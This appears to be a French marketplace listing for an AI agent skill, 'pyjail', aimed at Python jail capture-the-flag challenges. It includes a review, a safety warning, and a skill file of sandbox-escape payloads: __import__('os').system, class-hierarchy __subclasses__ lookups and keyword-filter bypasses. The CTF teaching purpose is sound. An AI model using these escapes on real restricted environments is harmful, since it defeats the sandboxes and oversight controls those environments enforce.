Notre avis
Aide à contourner les restrictions des environnements Python sandboxés dans les contextes eval/exec filtrés ou les challenges de jail.
Points forts
- Propose plusieurs techniques de contournement (builtins, hiérarchie de classes, encodage).
- Fournit une commande de débogage rapide pour trouver l'index des classes utiles.
- Accompagné de fichiers de référence détaillés pour les contournements et les payloads.
Limites
- Certaines techniques dépendent de la version de Python (ex. breakpoint nécessite Python 3.7+).
- Ne couvre pas tous les types de filtres possibles (ex. AST, bytecode).
- Les références peuvent ne pas être à jour avec les derniers contournements.
Utilisez cette compétence lorsque vous devez exécuter des commandes dans un environnement Python restreint ou résoudre un défi de type Python jail.
Ne l'utilisez pas pour du développement Python normal ou dans des environnements non restreints.
Analyse de sécurité
PrudenceThe skill equips an agent with techniques to bypass Python sandbox restrictions entirely, enabling arbitrary code execution. While intended for legitimate security research/CTF challenges, it lowers the barrier to executing powerful commands and could inadvertently cause harm if used improperly.
- •Provides Python escape payloads that can execute arbitrary system commands, which could be misused for destructive actions or data exfiltration if applied outside controlled CTF/sandbox environments.
Exemples
I need to execute 'cat flag.txt' inside a Python jail that blocks '__import__'. Show me how to use class hierarchy to bypass.Help me find the index of a useful subclass to execute system commands in a Python jail by enumerating subclasses.The Python jail blocks the word 'os'. How can I call os.system using string concatenation or chr()?name: pyjail description: Escapes Python sandbox restrictions. Use when working with restricted Python eval/exec environments, sandbox escapes, filtered input challenges, or Python jail challenges. allowed-tools: Bash, Read, Write, Grep, Glob
Python Jail Escape Skill
Quick Workflow
Progress:
- [ ] Identify restrictions (blocked keywords/chars)
- [ ] Try basic escapes first
- [ ] If builtins blocked, use class hierarchy
- [ ] Bypass filters with encoding/concatenation
- [ ] Execute command to get flag
Quick Reference - Common Escapes
# Basic command execution
__import__('os').system('cat flag.txt')
eval("__import__('os').system('id')")
exec("import os; os.system('ls')")
# Using breakpoint (Python 3.7+)
breakpoint() # Drops into pdb, then !cat flag.txt
# No builtins - class hierarchy
().__class__.__base__.__subclasses__()[132].__init__.__globals__['system']('cat flag')
# Keyword bypass
__import__('o'+'s').system('cat flag')
__import__(chr(111)+chr(115)).system('cat flag')
Reference Files
| Topic | Reference | |-------|-----------| | Bypass Techniques | reference/bypass.md | | Complete Payloads | reference/payloads.md |
Quick Debugging
# Find useful class index
for i, c in enumerate(().__class__.__base__.__subclasses__()):
if 'wrap' in str(c): print(i, c)
# Check available builtins
dir(__builtins__)
Auditeur de Securite
Securite
Analyse le code pour detecter les vulnerabilites OWASP Top 10.
Checklist de Sécurité OWASP
Securite
Génère des checklists de sécurité applicative basées sur l'OWASP Top 10.
Modélisation de Menaces
Securite
Génère des documents de modélisation de menaces avec analyse STRIDE.